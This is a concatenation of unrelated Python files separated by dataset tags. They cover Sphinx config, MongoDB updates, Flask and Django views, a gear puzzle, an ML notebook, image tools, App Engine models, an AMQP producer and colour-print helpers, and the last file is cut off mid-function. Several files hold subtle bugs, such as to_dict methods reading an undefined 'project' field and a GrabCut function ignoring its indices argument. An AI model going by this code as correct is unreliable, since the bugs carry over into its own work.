'collapse_navigation': False, 'sticky_navigation': True, 'navigation_depth': 3, 'includehidden': True, 'titles_only': False } # Extension: sphinx.ext.intersphinx # -------------------------------------------------- # A mapping: id -> (target, invintory) # where target is the base URL of the target documentation, # and invintory is the name of the inventory file, or None for the default. 
intersphinx_mapping = { 'python': ('https://docs.python.org/3', None), 'numpy': ('https://docs.scipy.org/doc/numpy/', None), 'scipy': ('https://docs.scipy.org/doc/scipy/reference/', None), 'pandas': ('https://pandas.pydata.org/pandas-docs/stable/', None), 'matplotlib': ('https://matplotlib.org/', None), 'xarray': ('http://xarray.pydata.org/en/stable/', None), 'sklearn': ('http://scikit-learn.org/stable', None), } # Extension: sphinx.ext.autodoc # -------------------------------------------------- autodoc_default_options = { 'members': True, } # Extension: sphinx.ext.autosummary # -------------------------------------------------- autosummary_generate = True autosummary_generate_overwrite = True # Extension: sphinx.ext.napoleon # -------------------------------------------------- napoleon_google_docstring = True napoleon_numpy_docstring = False napoleon_use_param = False napoleon_use_rtype = False # Extension: sphinx.ext.todo # -------------------------------------------------- # Toggle output for ..todo:: and ..todolist:: todo_include_todos = True # Path setup # -------------------------------------------------- # All extensions and modules to document with autodoc must be in sys.path. def add_path(path): '''Add a directory to the import path, relative to the documentation root. ''' import os import sys path = os.path.abspath(path) sys.path.insert(0, path) add_path('..') # The root of the repo, puts the `apollo` package on the path.
nilq/baby-python
python
"""Set a single ``data.<prop>`` property on a Mongo document, coercing
string values to numbers when they parse as such."""


def readValue(value):
    """Coerce a string to ``int``, then ``float``; anything else is
    returned unchanged.

    ``int()`` is tried *before* ``float()``: ``float()`` accepts every
    integer literal, so the original float-first ordering made the int
    branch unreachable and stored "5" as 5.0.
    """
    if not isinstance(value, str):
        # Already a concrete (non-string) value — nothing to parse,
        # and int() would truncate a real float.
        return value
    try:
        return int(value)
    except ValueError:
        pass
    try:
        return float(value)
    except ValueError:
        pass
    return value


def run(host=None, db=None, coll=None, key=None, prop=None, value=None):
    """Set ``data.<prop>`` to the parsed *value* on the document whose
    ``_id`` is the ObjectId hex string *key*, in collection *coll* of
    database *db* on *host*."""
    # Imported lazily so the module (and readValue) stays usable where
    # pymongo/bson are not installed.
    from bson.objectid import ObjectId
    from pymongo import MongoClient

    # Connect to the Mongo collection
    client = MongoClient(host)
    database = client[db]
    graph = database[coll]

    parsed = readValue(value)
    # Collection.update() was deprecated in PyMongo 3 and removed in 4;
    # update_one() is the supported single-document equivalent.
    graph.update_one({"_id": ObjectId(key)}, {"$set": {"data.%s" % (prop): parsed}})
nilq/baby-python
python
from flask import Flask, render_template, Blueprint
# NOTE(review): BBCScraper, MaanHealthScraper, CovidPalestine and
# MaanNewsScraper are imported but unused below (only referenced in
# commented-out code); Flask itself is also unused in this module.
from modules.BBCScraper import BBCScraper
from modules.MaanScraper import MaanHealthScraper
from modules.MOHScraper import CovidPalestine
from modules.MaanScraper import MaanNewsScraper
import time
import concurrent.futures
from modules.CovidScraper import BBCCovidScraper, WhoCovidScraper

# Blueprint grouping the COVID-19 pages; registered by the main app.
covid = Blueprint('covid', __name__)


@covid.route('/covid19')
def load_covid():
    """Scrape the BBC and WHO COVID-19 article feeds concurrently and
    render them into the covid19 template.

    The two scrapes run in a thread pool so their network waits overlap;
    elapsed wall time is printed for diagnostics.
    """
    start = time.perf_counter()
    with concurrent.futures.ThreadPoolExecutor() as executer:
        # f1 = executer.submit(MaanNewsScraper.get_covid_status)
        f2 = executer.submit(BBCCovidScraper.get_content)
        f3 = executer.submit(WhoCovidScraper.get_content)
        # palestine_summary = f1.result()
        bbc_corona_articles = f2.result()
        who_corona_articles = f3.result()
    finish = time.perf_counter()  # end timer
    print(f"Finished in {round(finish-start,2)} seconds")
    return render_template("covid/covid19.html",
                           bbc_corona_articles=bbc_corona_articles,
                           who_corona_articles=who_corona_articles
                           )
nilq/baby-python
python
from fractions import Fraction


def answer(pegs):
    """Solve the "gearing up" puzzle: gears centered on the given ascending
    peg positions, adjacent gears touching, such that the last gear spins at
    twice the rate of the first (its radius is exactly half the first's).

    :param pegs: ascending peg x-positions (list of ints).
    :return: ``[numerator, denominator]`` of the first gear's radius in
        lowest terms, or ``[-1, -1]`` when no assembly with every radius
        >= 1 exists.
    """
    arr_length = len(pegs)
    if (not pegs) or arr_length == 1:
        return [-1, -1]

    even = arr_length % 2 == 0
    # Telescoping the chain r_i + r_{i+1} = d_i with r_last = r_first / 2
    # yields a closed form for the first radius from an alternating sum of
    # the peg positions.
    total = (-pegs[0] + pegs[arr_length - 1]) if even else (-pegs[0] - pegs[arr_length - 1])
    if arr_length > 2:
        for index in range(1, arr_length - 1):
            total += 2 * (-1) ** (index + 1) * pegs[index]

    # Exact rational arithmetic. The original went through float()/
    # limit_denominator(), which can mis-round the radius.
    first_gear_radius = Fraction(2 * total, 3) if even else Fraction(2 * total)
    if first_gear_radius < 1:
        return [-1, -1]

    # Validate the whole chain. The original loop stopped one gap short
    # (range(arr_length - 2)), so the final gear's radius was never checked
    # and the two-peg case was not validated at all.
    current_radius = first_gear_radius
    for index in range(arr_length - 1):
        center_distance = pegs[index + 1] - pegs[index]
        next_radius = center_distance - current_radius
        if current_radius < 1 or next_radius < 1:
            return [-1, -1]
        current_radius = next_radius

    return [first_gear_radius.numerator, first_gear_radius.denominator]


if __name__ == "__main__":
    # Read space-separated peg positions from stdin, e.g. "4 30 50" -> [12, 1].
    pegs = list(map(int, input().split()))
    print(answer(pegs))
    # print(answer([4, 9, 17, 31, 40]))
    # print(answer([4, 30, 50]))
nilq/baby-python
python
#!/usr/bin/env python
# coding: utf-8

# Jupyter-notebook export: trains a RandomForest regressor to predict used-car
# selling prices from car_data.csv and pickles the fitted search object.
# NOTE(review): the get_ipython() calls mean this file only runs inside
# IPython/Jupyter, not as a plain script.

# In[1]:

import pandas as pd

# In[2]:

df = pd.read_csv('car_data.csv')

# In[3]:

df.head()

# In[5]:

df.shape

# In[6]:

print(df['Seller_Type'].unique())

# In[26]:

print(df['Transmission'].unique())
print(df['Owner'].unique())
print(df['Fuel_Type'].unique())

# In[8]:

# check missing or null values
df.isnull().sum()

# In[9]:

df.describe()

# In[11]:

df.columns

# In[12]:

# Keep only the modeling columns; Selling_Price is the target.
final_dataset = df[['Year', 'Selling_Price', 'Present_Price', 'Kms_Driven',
                    'Fuel_Type', 'Seller_Type', 'Transmission', 'Owner']]

# In[13]:

final_dataset.head()

# In[14]:

# Derive car age from a fixed reference year.
# NOTE(review): final_dataset is a column-slice of df — pandas may emit a
# SettingWithCopyWarning here; confirm a .copy() isn't needed.
final_dataset['Current_Year'] = 2020

# In[15]:

final_dataset.head()

# In[16]:

final_dataset['no_of_year'] = final_dataset['Current_Year'] - final_dataset['Year']

# In[17]:

final_dataset.head()

# In[19]:

final_dataset.drop(['Year'], axis=1, inplace=True)

# In[20]:

final_dataset.head()

# In[21]:

final_dataset.drop(['Current_Year'], axis=1, inplace=True)

# In[22]:

final_dataset.head()

# In[30]:

# One-hot encode the categorical columns, dropping one level each to avoid
# the dummy-variable trap.
final_dataset = pd.get_dummies(final_dataset, drop_first=True)

# In[31]:

final_dataset.head()

# In[32]:

final_dataset.corr()

# In[33]:

import seaborn as sns

# In[34]:

sns.pairplot(final_dataset)

# In[35]:

import matplotlib.pyplot as plt
get_ipython().run_line_magic('matplotlib', 'inline')

# In[37]:

corrmat = final_dataset.corr()
top_corr_features = corrmat.index
plt.figure(figsize=(20, 20))
# plot heat map
g = sns.heatmap(final_dataset[top_corr_features].corr(), annot=True, cmap="RdYlGn")

# In[59]:

final_dataset.head()

# In[60]:

# independent and dependent features (target Selling_Price is column 0)
X = final_dataset.iloc[:, 1:]
y = final_dataset.iloc[:, 0]

# In[61]:

X.head()

# In[62]:

y.head()

# In[63]:

# ordering of features importance
from sklearn.ensemble import ExtraTreesRegressor
model = ExtraTreesRegressor()
model.fit(X, y)

# In[64]:

print(model.feature_importances_)

# In[65]:

# plot graph of feature importance for visualization
feat_importances = pd.Series(model.feature_importances_, index=X.columns)
feat_importances.nlargest(5).plot(kind='barh')
plt.show()

# In[67]:

from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2)

# In[69]:

X_train.shape

# In[70]:

from sklearn.ensemble import RandomForestRegressor
# NOTE(review): this instance is never used — rf_random is rebound to the
# RandomizedSearchCV object below.
rf_random = RandomForestRegressor()

# In[78]:

# Hyperparameters
# Randomized Search CV

# Number Of trees in random forest
import numpy as np
n_estimators = [int(x) for x in np.linspace(start=100, stop=1200, num=12)]
# Number of features to consider at every split
max_features = ['auto', 'sqrt']
# Maximum number of levels in a tree
max_depth = [int(x) for x in np.linspace(5, 30, num=6)]
# max_depth.append(None)
# Minimum number of samples required to split a node
min_samples_split = [2, 5, 10, 15, 100]
# Minimum number of samples required to split each leaf node
min_samples_leaf = [1, 2, 5, 10]

# In[79]:

from sklearn.model_selection import RandomizedSearchCV

# In[80]:

# create random grid
random_grid = {'n_estimators': n_estimators,
               'max_features': max_features,
               'max_depth': max_depth,
               'min_samples_split': min_samples_split,
               'min_samples_leaf': min_samples_leaf}
print(random_grid)

# In[83]:

# use random grid to search for best hyperparameters
# first create the base model to tune
rf = RandomForestRegressor()

# In[85]:

rf_random = RandomizedSearchCV(estimator=rf, param_distributions=random_grid,
                               scoring='neg_mean_squared_error', n_iter=10,
                               cv=5, verbose=2, random_state=42, n_jobs=1)

# In[86]:

rf_random.fit(X_train, y_train)

# In[87]:

predictions = rf_random.predict(X_test)

# In[88]:

predictions

# In[89]:

# residual distribution — should be roughly centered on zero
sns.distplot(y_test - predictions)

# In[90]:

plt.scatter(y_test, predictions)

# In[92]:

import pickle
# open a file where you want to store data
file = open('random_forest_regression_model.pkl', 'wb')

# dump information to that file
pickle.dump(rf_random, file)
nilq/baby-python
python
from PIL import Image
import numpy as np
import time

# Interactive Turkish-language console menu for simple image operations:
# 1) load an image, 2) convert to greyscale, 3) flip vertically, 4) quit.
# NOTE(review): all three operation functions read the module-level global
# ``pic``, which is only assigned after menu option 1 — selecting 2 or 3
# first raises NameError despite the prompt loop's attempt to prevent it.


def renk_degisimi():
    """Build a greyscale copy of ``pic`` via the ITU-R 601 luma weights.

    NOTE(review): ``newpic`` is computed but never shown, saved or returned,
    and the function then reads 9 ints from stdin into an unused 3x3
    ``matrix2`` — this function looks unfinished; confirm intent.
    """
    h = pic.shape[0]
    w = pic.shape[1]
    newpic = np.zeros((h, w))
    for i in range(h):
        for j in range(w):
            newpic[i][j] += pic[i][j][0]*0.2989 + pic[i][j][1]*0.5870 + pic[i][j][2]*0.1140
    matrix2 = []
    for i in range(3):
        b = []
        for j in range(3):
            b.append(int(input()))
        matrix2.append(b)


def kirpma():
    """Crop stub: only reads the first coordinate and does nothing with it.

    NOTE(review): unfinished and never reachable from the menu below.
    """
    x1 = int(input("x1 değerini giriniz: "))


def terscevir():
    """Show ``pic`` flipped vertically (rows reversed)."""
    tersfoto = pic.copy()
    tersfotos = tersfoto[::-1]
    son = Image.fromarray(tersfotos)
    son.show()


# --- Menu driver (top-level script) ---
# First prompt: reject anything but 1-4.
secim = input("1-Resim Ekleyin\n2-Resmi siyah ve beyaz hale çevirin\n3-Resmi ters çevirin\n4-Çıkış\nSeçiminizi giriniz: ")
while secim != "1" and secim != "2" and secim != "3" and secim != "4":
    time.sleep(1)
    print()
    print("Lütfen seçeneklerden birini giriniz.")
    print()
    time.sleep(1)
    secim = input("1-Resim Ekleyin\n2-Resmi siyah ve beyaz hale çevirin\n3-Resmi ters çevirin\n4-Çıkış\nSeçiminizi giriniz: ")
print()
# Options 2/3 require an image to have been loaded first; keep re-prompting.
while secim == "2" or secim == "3":
    time.sleep(0.5)
    print("İşlem yapmadan önce resim yüklemeniz gerekmektedir\n")
    time.sleep(1)
    secim = input("1-Resim Ekleyin\n2-Resmi siyah ve beyaz hale çevirin\n3-Resmi ters çevirin\n4-Çıkış\nSeçiminizi giriniz: ")
    while secim != "1" and secim != "2" and secim != "3" and secim != "4":
        print("Lütfen seçeneklerden birini giriniz.")
        secim = input("1-Resim Ekleyin\n2-Resmi siyah ve beyaz hale çevirin\n3-Resmi ters çevirin\n4-Çıkış\nSeçiminizi giriniz: ")
# Main loop: each inner while handles one menu option until secim changes.
while True:
    while secim == "1":
        picture = input("Lütfen yüklemek istediğiniz resmin adını giriniz(örnek: resim.jpg): ")
        print()
        time.sleep(1)
        print("{} resmi yüklendi".format(picture))
        print()
        time.sleep(1)
        picture_open = Image.open(picture)
        pic = np.array(picture_open)  # module global read by the operations
        secim = input("1-Resim Ekleyin\n2-Resmi siyah ve beyaz hale çevirin\n3-Resmi ters çevirin\n4-Çıkış\nSeçiminizi giriniz: ")
        while secim != "1" and secim != "2" and secim != "3" and secim != "4":
            print("Lütfen seçeneklerden birini giriniz.")
            secim = input("1-Resim Ekleyin\n2-Resmi siyah ve beyaz hale çevirin\n3-Resmi ters çevirin\n4-Çıkış\nSeçiminizi giriniz: ")
        print()
    while secim == "2":
        renk_degisimi()
        secim = input("1-Resim Ekleyin\n2-Resmi siyah ve beyaz hale çevirin\n3-Resmi ters çevirin\n4-Çıkış\nSeçiminizi giriniz: ")
        while secim != "1" and secim != "2" and secim != "3" and secim != "4":
            print("Lütfen seçeneklerden birini giriniz.")
            secim = input("1-Resim Ekleyin\n2-Resmi siyah ve beyaz hale çevirin\n3-Resmi ters çevirin\n4-Çıkış\nSeçiminizi giriniz: ")
        print()
    while secim == "3":
        terscevir()
        secim = input("1-Resim Ekleyin\n2-Resmi siyah ve beyaz hale çevirin\n3-Resmi ters çevirin\n4-Çıkış\nSeçiminizi giriniz: ")
        while secim != "1" and secim != "2" and secim != "3" and secim != "4":
            print("Lütfen seçeneklerden birini giriniz.")
            secim = input("1-Resim Ekleyin\n2-Resmi siyah ve beyaz hale çevirin\n3-Resmi ters çevirin\n4-Çıkış\nSeçiminizi giriniz: ")
        print()
    while secim == "4":
        print("Çıkış yapılıyor.")
        time.sleep(1)
        quit()
nilq/baby-python
python
from django.shortcuts import render, redirect
from django.contrib.auth import login, authenticate, logout
from django.http import HttpResponse
from account.forms import AccountAuthenticationForm, RegistrationForm, AccountUpdateForm
from django.contrib import messages
from django.conf import settings
from django.contrib.auth.models import User
from account.models import Account
from posts.models import Post
from posts.forms import PostModelForm
import random
from django.views.generic import (
    DetailView
)

'''
def profiles(request):
    data =Post.objects.all()
    paginate_by = 2
    ordering = ['post_date']
    return render(request,'account/account.html',{'data':data})
'''


def Userfeed(request):
    """Render the user feed: all posts, a new-post form, and three random
    profile suggestions.

    NOTE(review): ``random.sample(all_posts, 3)`` raises ValueError when
    fewer than 3 Account rows exist — confirm a guard is added upstream.
    """
    allposts = Post.objects.all()
    # details=Post.objects.get(id=id)
    # posts_form = PostModelForm()
    # if request.method == 'POST':
    #     posts_form = PostModelForm(request.POST )
    #     if posts_form.is_valid():
    #         content = request.POST.get('content')
    #         # image = request.POST.get('image')
    #         # comment = PostModelForm.objects.create(post = Post, user = request.user, content = content)
    #         posts_form .save()
    #         return redirect("baseapp:details" )
    #     else:
    #         posts_form = PostModelForm()

    # initials
    p_form = PostModelForm()
    post_added = False
    # profile = Account.objects.get(user=request.user)
    # profile= self.request.usersettings.AUTH_USER_MODEL
    profile = request.user

    # A POST containing the submit button name means a new post was submitted.
    if 'submit_p_form' in request.POST:
        print(request.POST)
        p_form = PostModelForm(request.POST, request.FILES)
        if p_form.is_valid():
            instance = p_form.save(commit=False)
            instance.writer = profile
            instance.save()
            p_form = PostModelForm()  # fresh empty form after a save
            post_added = True

    # ppp= Account.objects.all()
    # Pick 3 random accounts as "profiles you may know" suggestions.
    profiles = []
    all_posts = list(Account.objects.all())
    # random_post_number = post_number - len(profiles)
    # random_posts = random.sample(all_posts, random_post_number)
    random_posts = random.sample(all_posts, 3)
    for random_post in random_posts:
        profiles.append(random_post)
    # return post_objects

    context = {
        'allposts': allposts,
        'p_form': p_form,
        'profiles': profiles,
        'post_added': post_added,
    }
    return render(request, 'users/userfeed.html', context)


class ProfileDetailView(DetailView):
    """Public profile page for a single Account, looked up by primary key."""
    model = Account
    context_object_name = 'my_profile'
    template_name = 'account/account.html'

    def get_object(self, **kwargs):
        # NOTE(review): Account.objects.get raises DoesNotExist (HTTP 500)
        # for a bad pk; get_object_or_404 would be the conventional choice.
        pk = self.kwargs.get('pk')
        view_profile = Account.objects.get(pk=pk)
        return view_profile


def edit_account_view(request, *args, **kwargs):
    """Let a logged-in user edit their own account; other users get a
    plain refusal response."""
    if not request.user.is_authenticated:
        return redirect("login")
    user_id = kwargs.get("user_id")
    account = Account.objects.get(pk=user_id)
    if account.pk != request.user.pk:
        return HttpResponse("You cannot edit someone elses profile.")
    context = {}
    if request.POST:
        form = AccountUpdateForm(request.POST, request.FILES, instance=request.user)
        if form.is_valid():
            form.save()
            new_username = form.cleaned_data['username']  # NOTE(review): unused
            return redirect("account:profile-page")
        else:
            # Re-render with the submitted (invalid) data plus initials.
            # NOTE(review): this initial dict includes "hide_email" but the
            # GET branch below does not — confirm which is intended.
            form = AccountUpdateForm(request.POST,
                                     instance=request.user,
                                     initial={
                                         "id": account.pk,
                                         "email": account.email,
                                         "username": account.username,
                                         "profile_image": account.profile_image,
                                         "hide_email": account.hide_email,
                                         "bio": account.bio,
                                         "full_name": account.full_name,
                                     }
                                     )
            context['form'] = form
    else:
        form = AccountUpdateForm(
            initial={
                "id": account.pk,
                "email": account.email,
                "username": account.username,
                "profile_image": account.profile_image,
                "bio": account.bio,
                "full_name": account.full_name,
            }
        )
        context['form'] = form
    # Exposed so the template can warn about upload size limits.
    context['DATA_UPLOAD_MAX_MEMORY_SIZE'] = settings.DATA_UPLOAD_MAX_MEMORY_SIZE
    return render(request, "account/edit_account.html", context)


def registration_view(request, *args, **kwargs):
    """Create a new account from the registration form, then send the user
    to the login page (no auto-login; see commented-out code)."""
    context = {}
    if request.POST:
        form = RegistrationForm(request.POST)
        if form.is_valid():
            form.save()
            # email = form.cleaned_data.get('email')
            # raw_password = form.cleaned_data.get('password1')
            # accounts = authenticate(email=email, password=raw_password)
            # login(request, accounts)
            return redirect('account:login')
        else:
            context['registration_form'] = form
    else:  # GET request
        form = RegistrationForm()
        context['registration_form'] = form
    return render(request, 'account/register.html', context)


def login_view(request, *args, **kwargs):
    """Authenticate by email/password; already-authenticated users are sent
    straight to their profile page."""
    context = {}
    user = request.user
    if user.is_authenticated:
        return redirect("account:profile-page")
    if request.POST:
        form = AccountAuthenticationForm(request.POST)
        if form.is_valid():
            email = request.POST['email']
            password = request.POST['password']
            user = authenticate(email=email, password=password)
            if user:
                login(request, user)
                return redirect("account:profile-page")
    else:
        form = AccountAuthenticationForm()
    context['login_form'] = form
    return render(request, 'account/login.html', context)


def logout_view(request, *args, **kwargs):
    """Log the user out and render the logout confirmation page."""
    logout(request)
    return render(request, 'account/logout.html')
nilq/baby-python
python
import numpy as np
import cv2
from skimage import segmentation


def runGrabCut(_image, boxes, indices):
    """Run GrabCut once per detection box and return one masked copy of the
    input image per box, with background pixels zeroed out.

    NOTE(review): the `indices` parameter is ignored -- it is immediately
    overwritten with len(boxes), so every box is segmented regardless of
    which indices the detector kept.  Preserved as-is; confirm intent.
    """
    segmented = []
    image = _image.copy()
    # ensure at least one detection exists
    indices = len(boxes)
    if indices > 0:
        for i in range(indices):
            # Work on a fresh copy for every box.
            image = _image.copy()
            # GrabCut working buffers: the label mask plus the two GMM models.
            mask = np.zeros(_image.shape[:2], np.uint8)
            bgdModel = np.zeros((1, 65), np.float64)
            fgbModel = np.zeros((1, 65), np.float64)
            # Rectangle used for GC_INIT_WITH_RECT initialisation.
            rect = (int(boxes[i][0]), int(boxes[i][1]),
                    int(boxes[i][2]), int(boxes[i][3]))
            print('rect', rect)
            # Three GrabCut iterations seeded from the rectangle.
            cv2.grabCut(image, mask, rect, bgdModel, fgbModel, 3,
                        cv2.GC_INIT_WITH_RECT)
            # Labels 0 (sure background) and 2 (probable background) are
            # dropped; everything else counts as foreground.
            grab_mask = np.where((mask == 2) | (mask == 0), 0, 1).astype('uint8')
            # Zero out background pixels across all channels.
            image = image * grab_mask[:, :, np.newaxis]
            segmented.append(image)
    return segmented


if __name__ == '__main__':
    import argparse

    ap = argparse.ArgumentParser()
    ap.add_argument("-i", "--image", required=True,
                    help="path to input image")
    ap.add_argument("-y", "--yolo", required=True,
                    help="base path to YOLO directory")
    ap.add_argument("-c", "--confidence", type=float, default=0.25,
                    help="minimum probability to filter weak detections")
    ap.add_argument("-t", "--threshold", type=float, default=0.45,
                    help="threshold when applying non-maxima suppression")
    args = vars(ap.parse_args())

    import yolo

    img, boxes, idxs = yolo.runYOLOBoundingBoxes(args)
    images = runGrabCut(img, boxes, idxs)

    # Display and save each segmented detection.
    for i in range(len(images)):
        cv2.imshow("Image{}".format(i), images[i])
        cv2.imwrite("grabcut{}.jpg".format(i), images[i])
        cv2.waitKey(0)
nilq/baby-python
python
""" Copyright Tiyab KONLAMBIGUE Licensed under the BSD 3-Clause "New" or "Revised" license; you may not use this file except in compliance with the License. You may obtain a copy of the License at : https://opensource.org/licenses/BSD-3-Clause """ from google.appengine.ext import ndb class Job(ndb.Model): creation = ndb.DateTimeProperty(auto_now_add=True) updated = ndb.DateTimeProperty(auto_now=True) emails = ndb.StringProperty() project_id = ndb.StringProperty() bucket_id = ndb.StringProperty() machine_name = ndb.StringProperty() startup_script = ndb.StringProperty() shutdown_script = ndb.StringProperty() machine_type = ndb.StringProperty() machine_zone = ndb.StringProperty() machine_os = ndb.StringProperty() cron_schedule = ndb.StringProperty() after_run = ndb.StringProperty() max_running_time = ndb.StringProperty() job_name = ndb.StringProperty() job_status = ndb.StringProperty() last_run = ndb.DateTimeProperty() # Get list of job @classmethod def query(self, query, max_line): results = [] query = ndb.GqlQuery(query) for query_line in query.run(limit=max_line): results.append(query_line) return results # Get job def get(self, filtering): results = [] query = self.gql(filtering) for query_line in query: results.append(query_line) return results def to_dict(self): return { "key": self.key.urlsafe() if self.key else None, "creation": str(self.creation) if self.creation else None, "updated": str(self.updated) if self.updated else None, "emails": str(self.emails) if self.emails else None, "project": str(self.project) if self.project else None, "bucket_id": str(self.bucket_id) if self.bucket_id else None, "machine_name": str(self.machine_name) if self.machine_name else None, "startup_script": str(self.startup_script) if self.startup_script else None, "shutdown_script": str(self.shutdown_script) if self.shutdown_script else None, "machine_type": str(self.machine_type) if self.machine_type else None, "machine_zone": str(self.machine_zone) if self.machine_zone else None, 
"machine_os": str(self.machine_os) if self.machine_os else None, "after_run": str(self.after_run) if self.after_run else None, "cron_schedule": str(self.cron_schedule) if self.cron_schedule else None, "max_running_time": str(self.max_running_time) if self.max_running_time else None, "job_name": str(self.job_name) if self.job_name else None, "job_status": str(self.job_status) if self.job_status else None, "last_run": str(self.last_run) if self.last_run else None, } ## JOB TO RUN QUEUE class Queue(ndb.Model): creation = ndb.DateTimeProperty(auto_now_add=True) project_id = ndb.StringProperty() bucket_id = ndb.StringProperty() machine_name = ndb.StringProperty() machine_type = ndb.StringProperty() machine_zone = ndb.StringProperty() machine_os = ndb.StringProperty() after_run = ndb.StringProperty() max_running_time = ndb.StringProperty() job_name = ndb.StringProperty() # Get list of job @classmethod def query(self, query, max_line): results = [] query = ndb.GqlQuery(query) for query_line in query.run(limit=max_line): results.append(query_line) return results # Get job def get(self, filtering): results = [] query = self.gql(filtering) for query_line in query: results.append(query_line) return results def to_dict(self): return { "key": self.key.urlsafe() if self.key else None, "creation": str(self.creation) if self.creation else None, "project": str(self.project) if self.project else None, "bucket_id": str(self.bucket_id) if self.bucket_id else None, "machine_name": str(self.machine_name) if self.machine_name else None, "machine_type": str(self.machine_type) if self.machine_type else None, "machine_zone": str(self.machine_zone) if self.machine_zone else None, "machine_os": str(self.machine_os) if self.machine_os else None, "after_run": str(self.after_run) if self.after_run else None, "max_running_time": str(self.max_running_time) if self.max_running_time else None, "job_name": str(self.job_name) if self.job_name else None, "job_status": str(self.job_status) if 
self.job_status else None, }
nilq/baby-python
python
#!/usr/bin/env python
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements.  See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership.  The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License.  You may obtain a copy of the License at
#
#   http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied.  See the License for the
# specific language governing permissions and limitations
# under the License.
#

from __future__ import print_function, unicode_literals

import optparse

from proton import Message
from proton.handlers import MessagingHandler
from proton.reactor import Container


# Helper Functions
def get_options():
    """Parse command-line arguments and return the parsed options object."""
    # parse cmd arguments
    parser = optparse.OptionParser(usage="usage: %prog [options]",
                                   description="Sends messages to a topic on the amqp broker")
    parser.add_option("-u", "--url", action="store", default="amqp://localhost:5672",
                      help="Url to connect to amqp broker (default %default)")
    parser.add_option("-t", "--topic", action="store", default="a/topic",
                      help="Topic to send message (default %default)")
    parser.add_option("-m", "--messages", type="int", default=100,
                      help="number of messages to receive (default %default)")
    parser.add_option("-o", "--username", default=None,
                      help="username for authentication (default %default)")
    parser.add_option("-p", "--password", default=None,
                      help="password for authentication (default %default)")
    (options, args) = parser.parse_args()
    return options


"""
Proton event Handler class
Establishes an amqp connection and creates an amqp sender link to transmit messages
"""
class MessageProducer(MessagingHandler):
    def __init__(self, url, address, count, username, password):
        super(MessageProducer, self).__init__()
        # the solace message broker amqp url
        self.url = url
        # the prefix amqp address for a solace topic
        self.topic_address = address
        # authentication credentials
        self.username = username
        self.password = password
        # counters: total to send, sent so far, broker-confirmed so far
        self.total = count
        self.sent = 0
        self.confirmed = 0

    def on_start(self, event):
        """Open the connection (PLAIN when credentials are given, otherwise
        ANONYMOUS) and create the sender link."""
        # select authentication from SASL PLAIN or SASL ANONYMOUS
        if self.username:
            # creates and establishes amqp connection using PLAIN authentication
            conn = event.container.connect(url=self.url,
                                           user=self.username,
                                           password=self.password,
                                           allow_insecure_mechs=True)
        else:
            # creates and establishes amqp connection using ANONYMOUS authentication
            conn = event.container.connect(url=self.url)
        if conn:
            # creates sender link to transfer message to the broker
            event.container.create_sender(conn, target=self.topic_address)

    def on_sendable(self, event):
        """Send messages while link credit is available, up to self.total."""
        while event.sender.credit and self.sent < self.total:
            # the durable property on the message sends the message as a persistent message
            event.sender.send(Message(body="hello "+str(self.sent), durable=True))
            self.sent += 1

    def on_accepted(self, event):
        """Count broker acknowledgements; close once all are confirmed."""
        self.confirmed += 1
        if self.confirmed == self.total:
            print('confirmed all messages')
            event.connection.close()

    def on_rejected(self, event):
        """A rejection still counts towards the settled total, so the
        connection closes after every message has a final outcome."""
        self.confirmed += 1
        print("Broker", self.url, "Reject message:", event.delivery.tag,
              "Remote disposition:", event.delivery.remote.condition)
        if self.confirmed == self.total:
            event.connection.close()

    # receives socket or authentication failures
    def on_transport_error(self, event):
        print("Transport failure for amqp broker:", self.url, "Error:", event.transport.condition)
        MessagingHandler.on_transport_error(self, event)


# get program options
options = get_options()

"""
The amqp address can be a topic or a queue.
Use 'topic://' prefix in the amqp address for the amqp sender target address
to indicate which topic message are sent to.
"""
amqp_address = 'topic://' + options.topic

try:
    # starts the proton container event loop with the MessageProducer event handler
    Container(MessageProducer(options.url, amqp_address, options.messages,
                              options.username, options.password)).run()
except KeyboardInterrupt:
    pass
nilq/baby-python
python
# Tuples are immutable sequences; the syntax uses ( parentheses ).

# A list supports in-place item assignment...
l = [1, 2, 3]
l[0] = 5  # works fine on a list
print(type(l))
print(l)

# ...a tuple does not.
t = (1, 2, 3)
# t[0] = 5  # would raise TypeError: tuples are immutable
print(type(t))
print(t)

# Tuples expose only two methods (count and index) -- far fewer than lists.
t = ('a', 'a', 'b', 'b', 'c', 'c')
a_count = t.count('a')
first_c = t.index('c')
print(f"the amount of instances of the character 'a' in the tuple is {a_count}")
print(f"the first index in the tuple that has the character 'c' is {first_c}")
nilq/baby-python
python
import sys
import re
from functools import partial


def flush_print(st, *args, **kwargs):
    """printf-style print that flushes stdout when attached to a TTY.

    `end` keyword defaults to a newline, mirroring print().
    """
    end = kwargs.pop('end', '\n')
    if args:
        st = st % args
    print(st, end=end)
    if sys.stdout.isatty():
        sys.stdout.flush()


def cprint(color_fn, st, *args):
    """Print `st` (optionally %-formatted) through `color_fn`, no newline."""
    if args:
        st = st % args
    print(color_fn(st), end='')
    sys.stdout.flush()


def dot_lead(st, *args, **kwargs):
    """Return `st` padded with dots out to `width` (default 60) columns."""
    width = kwargs.pop('width', 60)
    if args:
        st = st % args
    dots = '.' * (width - len(st))
    return '%s%s' % (st, dots)


def dot_leader(st, *args, **kwargs):
    """Print a dot-padded line; remaining kwargs go to flush_print.

    Now delegates to dot_lead instead of duplicating its padding logic.
    """
    width = kwargs.pop('width', 60)
    flush_print(dot_lead(st, *args, width=width), **kwargs)


COLORS = (
    'black', 'red', 'green', 'yellow',
    'blue', 'magenta', 'cyan', 'white')

STYLES = (
    'bold', 'faint', 'italic', 'underline', 'blink', 'blink2',
    'negative', 'concealed', 'crossed')


def _ansi_color(x, offset, ansi_code):
    """Translate a color name or 0-255 palette index into SGR parameters.

    `offset` is the base for named colors (30 fg / 40 bg); `ansi_code`
    selects the extended 256-color palette (38 fg / 48 bg).
    """
    if x:
        if x in COLORS:
            return [f'{offset + COLORS.index(x)}']
        if isinstance(x, int) and 0 <= x <= 255:
            return [f'{ansi_code};5;{x}']
        # BUG FIX: this message was a plain string, so "{x}" was emitted
        # literally; it is now an f-string and reports the offending value.
        raise Exception(f'Invalid color [{x}]')
    return []


def _style_codes(style):
